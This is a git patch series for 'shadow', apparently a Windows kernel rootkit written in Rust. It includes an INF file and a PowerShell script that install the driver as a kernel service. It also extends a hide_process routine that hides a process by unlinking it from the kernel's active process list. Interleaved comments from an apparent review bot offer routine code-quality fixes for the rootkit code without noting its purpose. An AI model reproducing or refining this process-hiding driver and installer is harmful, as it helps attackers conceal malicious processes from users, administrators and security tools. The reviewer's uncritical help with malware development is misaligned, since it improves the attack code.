From a2ed8c4bb2421222cad1d203f725a4b23257432c Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 15:36:05 -0800 Subject: [PATCH 01/12] Update shadow.inx --- driver/shadow.inx | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/driver/shadow.inx b/driver/shadow.inx index 328d813..612e5b7 100644 --- a/driver/shadow.inx +++ b/driver/shadow.inx @@ -5,7 +5,7 @@ [Version] Signature = "$WINDOWS NT$" Class = System ; TODO: specify appropriate Class -ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid +ClassGuid = {E7C2B7F0-3F3D-4EC8-B98A-123456789ABC} ; TODO: specify appropriate ClassGuid Provider = %ManufacturerName% CatalogFile = shadow.cat DriverVer = ; TODO: set DriverVer in stampinf property pages @@ -23,6 +23,9 @@ shadow.sys = 1,, ;***************************************** ; Install Section ;***************************************** +[DefaultInstall] +CopyFiles = File_Copy +AddService = shadow, 0x00000002, shadow_Service_Inst [Manufacturer] %ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 From 377092376819b854225d9adf668826eb5789a206 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 15:37:37 -0800 Subject: [PATCH 02/12] Update Cargo.toml --- driver/Cargo.toml | 1 + 1 file changed, 1 insertion(+) diff --git a/driver/Cargo.toml b/driver/Cargo.toml index f6a76c8..50d16eb 100644 --- a/driver/Cargo.toml +++ b/driver/Cargo.toml @@ -1,3 +1,4 @@ +[workspace] [package] name = "shadow" version = "0.1.0" From b02f30f6294ee02b53d8aa00d91e13a2e223348e Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:13:16 -0800 Subject: [PATCH 03/12] Update shadow.inx --- driver/shadow.inx | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) 
diff --git a/driver/shadow.inx b/driver/shadow.inx index 612e5b7..328d813 100644 --- a/driver/shadow.inx +++ b/driver/shadow.inx @@ -5,7 +5,7 @@ [Version] Signature = "$WINDOWS NT$" Class = System ; TODO: specify appropriate Class -ClassGuid = {E7C2B7F0-3F3D-4EC8-B98A-123456789ABC} ; TODO: specify appropriate ClassGuid +ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid Provider = %ManufacturerName% CatalogFile = shadow.cat DriverVer = ; TODO: set DriverVer in stampinf property pages @@ -23,9 +23,6 @@ shadow.sys = 1,, ;***************************************** ; Install Section ;***************************************** -[DefaultInstall] -CopyFiles = File_Copy -AddService = shadow, 0x00000002, shadow_Service_Inst [Manufacturer] %ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 From 018b9ab124b3a0c83a9b4e771e4aab29566936e7 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:31:35 -0800 Subject: [PATCH 04/12] Create install-driver.txt --- install-driver.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 install-driver.txt diff --git a/install-driver.txt b/install-driver.txt new file mode 100644 index 0000000..5afac04 --- /dev/null +++ b/install-driver.txt @@ -0,0 +1 @@ +rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\path\to\shadow.inf From 59776fe857c6eaf89ed6e04a4b75c0f539af9dfa Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:35:23 -0800 Subject: [PATCH 05/12] Update install-driver.txt --- install-driver.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/install-driver.txt b/install-driver.txt index 5afac04..12a9566 100644 --- a/install-driver.txt +++ b/install-driver.txt 
@@ -1 +1 @@ -rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\path\to\shadow.inf +rundll32.exe setupapi,InstallHinfSection DefaultInstall.NTamd64 132 C:\path\to\shadow.inf From 307a3e46ec762600f4d42fc126975106cb70da16 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:44:28 -0800 Subject: [PATCH 06/12] Update shadow.inx --- driver/shadow.inx | 46 +++++++++++----------------------------------- 1 file changed, 11 insertions(+), 35 deletions(-) diff --git a/driver/shadow.inx b/driver/shadow.inx index 328d813..63c12a4 100644 --- a/driver/shadow.inx +++ b/driver/shadow.inx @@ -1,14 +1,12 @@ -; ; shadow.inf -; [Version] -Signature = "$WINDOWS NT$" -Class = System ; TODO: specify appropriate Class -ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid -Provider = %ManufacturerName% +Signature = "$WINDOWS NT$" +Class = System +ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} +Provider = %ManufacturerName% CatalogFile = shadow.cat -DriverVer = ; TODO: set DriverVer in stampinf property pages +DriverVer = 03/04/2025,16.12.53.325 PnpLockdown = 1 [DestinationDirs] 
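Review bot: `DriverVer = 03/04/2025,16.12.53.325` bakes a one-off build timestamp into the .inx, the template file that the removed line (`DriverVer = ; TODO: set DriverVer in stampinf property pages`) reserved for stampinf to fill at build time; every later build will report this same version unless the line is edited by hand. If the build still runs stampinf over shadow.inx, keeping `DriverVer =` empty and letting the tool stamp it is the usual convention; if it does not, a comment saying the value is maintained manually would spare the next maintainer the guess. The same hunk also drops the `; TODO` markers on Class/ClassGuid without replacing them with a note on why the System class is the right choice, which is fine but worth one line of comment in the [Version] section.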
@@ -18,29 +16,15 @@ DefaultDestDir = 13 1 = %DiskName%,,,"" [SourceDisksFiles] -shadow.sys = 1,, +shadow.sys = 1,, -;***************************************** -; Install Section -;***************************************** - -[Manufacturer] -%ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 - -[Standard.NT$ARCH$.10.0...16299] -%shadow.DeviceDesc% = shadow_Device, Root\shadow ; TODO: edit hw-id - -[shadow_Device.NT] +[DefaultInstall.NTamd64] CopyFiles = File_Copy +AddService = shadow, 0x00000002, shadow_Service_Inst [File_Copy] shadow.sys -;-------------- Service installation -[shadow_Device.NT.Services] -AddService = shadow,%SPSVCINST_ASSOCSERVICE%, shadow_Service_Inst - -; -------------- shadow driver install sections [shadow_Service_Inst] DisplayName = %shadow.SVCDESC% ServiceType = 1 ; SERVICE_KERNEL_DRIVER @@ -48,15 +32,7 @@ StartType = 3 ; SERVICE_DEMAND_START ErrorControl = 1 ; SERVICE_ERROR_NORMAL ServiceBinary = %13%\shadow.sys -[shadow_Device.NT.Wdf] -KmdfService = shadow, shadow_wdfsect - -[shadow_wdfsect] -KmdfLibraryVersion = $KMDFVERSION$ - [Strings] -SPSVCINST_ASSOCSERVICE = 0x00000002 -ManufacturerName = "" ;TODO: Replace with your manufacturer name -DiskName = "shadow Installation Disk" -shadow.DeviceDesc = "shadow Device" -shadow.SVCDESC = "shadow Service" +ManufacturerName = "test" +DiskName = "shadow Installation Disk" +shadow.SVCDESC = "shadow Service" From 4cb53f4594ff8bcfd211d1c2a310a0842c343dbc Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:46:09 -0800 Subject: [PATCH 07/12] Update and rename install-driver.txt to install-driver.ps1 --- install-driver.ps1 | 44 ++++++++++++++++++++++++++++++++++++++++++++ install-driver.txt | 1 - 2 files changed, 44 insertions(+), 1 deletion(-) create mode 100644 install-driver.ps1 delete mode 100644 install-driver.txt 
diff --git a/install-driver.ps1 b/install-driver.ps1 new file mode 100644 index 0000000..0d5f8ae --- /dev/null +++ b/install-driver.ps1 @@ -0,0 +1,44 @@ +# Ensure the script is running with administrative privileges. +if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) +{ + Write-Error "This script must be run as Administrator." + exit 1 +} + +# Set the path to your INF file (update this path as needed) +$InfPath = "C:\path\to\shadow.inf" +$InfFullPath = Resolve-Path $InfPath + +Write-Output "Installing INF from: $InfFullPath" + +# Construct and run the rundll32 command to install the INF using the DefaultInstall.NTamd64 section +$rundllCmd = "rundll32.exe setupapi,InstallHinfSection DefaultInstall.NTamd64 132 `"$InfFullPath`"" +Write-Output "Executing: $rundllCmd" +Invoke-Expression $rundllCmd + +# Pause briefly to allow the INF installation to complete +Start-Sleep -Seconds 5 + +# Search for the driver file (shadow.sys) in the DriverStore\FileRepository +$DriverStorePath = "C:\Windows\System32\DriverStore\FileRepository" +$shadowSys = Get-ChildItem -Path $DriverStorePath -Recurse -Filter "shadow.sys" -ErrorAction SilentlyContinue | Select-Object -First 1 + +if ($null -eq $shadowSys) { + Write-Error "shadow.sys not found in DriverStore\FileRepository." + exit 1 +} + +$DriverFilePath = $shadowSys.FullName +Write-Output "Driver file found at: $DriverFilePath" + +# Create the service using sc.exe +$ServiceName = "shadow" +# Wrap the path in quotes (note the backticks for proper escaping in the command line) +$binPath = "`"$DriverFilePath`"" +$scCommand = "sc.exe create $ServiceName type= kernel binPath= $binPath start= demand" +Write-Output "Executing: $scCommand" +Invoke-Expression $scCommand + +# Query the service to verify it was created +Write-Output "Querying service $ServiceName:" +sc.exe query $ServiceName 
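Review bot: `Invoke-Expression $rundllCmd` and `Invoke-Expression $scCommand` assemble command lines as strings and re-parse them, which breaks on paths containing spaces, quotes or `$` and is what PSScriptAnalyzer's PSAvoidUsingInvokeExpression rule flags; the executables can be called directly, e.g. `& rundll32.exe 'setupapi,InstallHinfSection' DefaultInstall.NTamd64 132 "$InfFullPath"` (the comma must be quoted or PowerShell splits it into two arguments) and `& sc.exe create $ServiceName type= kernel binPath= "$DriverFilePath" start= demand`. Neither step checks `$LASTEXITCODE`, so when the INF install fails the script still sleeps, scans the DriverStore and reports only the later, less informative error; a `if ($LASTEXITCODE -ne 0) { Write-Error "..."; exit $LASTEXITCODE }` after each native call would surface the real cause. `Get-ChildItem ... -Filter "shadow.sys" | Select-Object -First 1` also takes whichever matching file the recursive scan meets first, which is not necessarily the package just installed; matching on the package directory name, or comparing the file hash against the built shadow.sys, would make the choice deterministic.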
diff --git a/install-driver.txt b/install-driver.txt deleted file mode 100644 index 12a9566..0000000 --- a/install-driver.txt +++ /dev/null @@ -1 +0,0 @@ -rundll32.exe setupapi,InstallHinfSection DefaultInstall.NTamd64 132 C:\path\to\shadow.inf From a6e1f6566163d13b0802b543dac767afdb5d0aeb Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 14:12:12 -0800 Subject: [PATCH 08/12] Update install-driver.ps1 --- install-driver.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/install-driver.ps1 b/install-driver.ps1 index 0d5f8ae..38ebe6a 100644 --- a/install-driver.ps1 +++ b/install-driver.ps1 @@ -40,5 +40,5 @@ Write-Output "Executing: $scCommand" Invoke-Expression $scCommand # Query the service to verify it was created -Write-Output "Querying service $ServiceName:" +Write-Output "Querying service $ServiceName" sc.exe query $ServiceName From 8889e621452b6fc1b67f6d82f85298432436f86a Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:04:07 -0800 Subject: [PATCH 09/12] Update Cargo.toml --- shadowx/Cargo.toml | 1 + 1 file changed, 1 insertion(+) diff --git a/shadowx/Cargo.toml b/shadowx/Cargo.toml index f25282b..6008baa 100644 --- a/shadowx/Cargo.toml +++ b/shadowx/Cargo.toml @@ -16,6 +16,7 @@ wdk-sys = "^0.3.0" wdk-alloc = "^0.3.0" spin = "0.9.8" obfstr = "0.4.4" +log = "0.4.22" bitfield = "0.17.0" ntapi = { version = "0.4.1", default-features = false } thiserror = { version = "2.0.10", default-features = false } From 1771b1e5acacd9ec78bceddaadf18fa9df1a41f4 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:13:03 -0800 Subject: [PATCH 10/12] Update error.rs --- shadowx/src/error.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/shadowx/src/error.rs b/shadowx/src/error.rs index 6efbea6..ce7bfa7 100644 --- a/shadowx/src/error.rs 
+++ b/shadowx/src/error.rs @@ -145,6 +145,10 @@ pub enum ShadowError { /// This occurs when the system fails to remove a callback that was previously registered. #[error("Error removing a callback")] RemoveFailureCallback, + /// Represents an error when the process's active list entry is invalid, + /// such as when both the forward and backward pointers are null. + #[error("Invalid list entry encountered")] + InvalidListEntry, /// Error indicating that a failure occurred while restoring a callback. /// From 588af198dc0fa0cb114f5414cda1aa8a4c0b535c Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:51:18 -0800 Subject: [PATCH 11/12] Update process.rs --- shadowx/src/process.rs | 47 ++++++++++++++++++++++++++++++++++-------- 1 file changed, 38 insertions(+), 9 deletions(-) diff --git a/shadowx/src/process.rs b/shadowx/src/process.rs index 0a744ac..fb0b363 100644 --- a/shadowx/src/process.rs +++ b/shadowx/src/process.rs 
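Review bot: The doc comment on the new `InvalidListEntry` variant says the entry is invalid `such as when both the forward and backward pointers are null`, but the only producer visible in this series (patch 11, `hide_process`) returns it when `next.is_null() || previous.is_null()`, i.e. when either pointer is null. Suggest `/// such as when the forward or the backward pointer is null.` so the variant's documentation states the condition that actually raises it. The enclosing `ShadowError` enum starts and ends outside the hunk.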
@@ -103,42 +103,71 @@ impl Process { /// in the list before it was modified. /// * `Err(ShadowError)` - Returns an error if the process lookup fails or the operation encounters an issue. pub unsafe fn hide_process(pid: usize) -> Result { + // Log the start of the process hiding routine. + log::info!("Attempting to hide process with PID: {}", pid); + // Getting offsets based on the Windows build number let active_process_link = get_active_process_link_offset(); let offset_lock = get_process_lock(); // Retrieve the EPROCESS structure for the target process let process = Self::new(pid)?; + log::info!("Found EPROCESS for PID {} at address: {:p}", pid, process.e_process); - // Retrieve the `LIST_ENTRY` for the active process link, which connects the process - // to the list of active processes in the system. + // Retrieve the `LIST_ENTRY` for the active process link. let current = process.e_process.cast::().offset(active_process_link) as PLIST_ENTRY; - let push_lock = process.e_process.cast::().offset(offset_lock) as *mut u64; + log::info!("Current LIST_ENTRY pointer: {:p}", current); - // Use synchronization to ensure thread safety while modifying the list + // Retrieve the push lock for synchronization. + let push_lock = process.e_process.cast::().offset(offset_lock) as *mut u64; + log::info!("Using push lock at: {:p}", push_lock); + + // Use synchronization to ensure thread safety while modifying the list. 
with_push_lock_exclusive(push_lock, || { + log::info!("Acquired exclusive push lock for process hiding"); + // The next process in the chain let next = (*current).Flink; - // The previous process in the chain let previous = (*current).Blink; - + + log::info!( + "Before unlink: current->Flink = {:p}, current->Blink = {:p}", + (*current).Flink, (*current).Blink + ); + log::info!("Neighboring entries: next = {:p}, previous = {:p}", next, previous); + + // Check if the neighboring pointers are valid before proceeding + if next.is_null() || previous.is_null() { + log::error!("One or both of the neighboring pointers are null. Aborting unlink operation."); + return Err(ShadowError::InvalidListEntry); + } + // Storing the previous list entry, which will be returned let previous_link = LIST_ENTRY { Flink: next as *mut LIST_ENTRY, Blink: previous as *mut LIST_ENTRY, }; - + // Unlink the process from the active list (*next).Blink = previous; (*previous).Flink = next; - + log::info!("Unlinked process from active process list"); + // Make the current list entry point to itself to hide the process (*current).Flink = current; (*current).Blink = current; - + log::info!("Process LIST_ENTRY modified to point to itself"); + + // Log final state of the current entry + log::info!( + "Final state of current LIST_ENTRY: Flink = {:p}, Blink = {:p}", + (*current).Flink, (*current).Blink + ); + Ok(previous_link) }) + } /// Unhides a process by restoring it to the active process list in the operating system. From d1317c70bb08f7204bfb4f240b58292fb74c178b Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:51:58 -0800 Subject: [PATCH 12/12] Update install-driver.ps1 --- install-driver.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/install-driver.ps1 b/install-driver.ps1 index 38ebe6a..968c5a3 100644 --- a/install-driver.ps1 +++ b/install-driver.ps1 
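Review bot: The function-level doc comment above the hunk (`* `Err(ShadowError)` - Returns an error if the process lookup fails or the operation encounters an issue.`) is not updated for the new failure mode; now that the closure returns `ShadowError::InvalidListEntry` before touching the list, a bullet such as `/// * `Err(ShadowError::InvalidListEntry)` - the entry's Flink or Blink is null; nothing is modified.` would tell callers that this error leaves the process untouched. The added `}` after the `})` that closes the `with_push_lock_exclusive` call also needs a look: no matching removed or context brace is visible in the hunk, so this line either closes `hide_process` (which would mean the function had no closing brace before, which seems unlikely) or introduces an extra brace; please confirm the crate builds with it. The start of `hide_process` and its doc comment lie above the hunk.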
@@ -6,7 +6,7 @@ if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdent } # Set the path to your INF file (update this path as needed) -$InfPath = "C:\path\to\shadow.inf" +$InfPath = ".\driver\target\release\shadow_package\shadow.inf" $InfFullPath = Resolve-Path $InfPath Write-Output "Installing INF from: $InfFullPath"
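Review bot: `$InfPath = ".\driver\target\release\shadow_package\shadow.inf"` is relative to the caller's current directory, not to the script, so the script only works when launched from the repository root; and the following `Resolve-Path $InfPath` raises a non-terminating error on a missing path and leaves `$InfFullPath` null, after which the rundll32 line (outside this hunk) runs with an empty path argument. Anchoring to the script and failing fast addresses both: `$InfFullPath = Resolve-Path (Join-Path $PSScriptRoot 'driver\target\release\shadow_package\shadow.inf') -ErrorAction Stop`. The comment above the line, `# Set the path to your INF file (update this path as needed)`, should then be revised to say the path is resolved relative to the script's own directory.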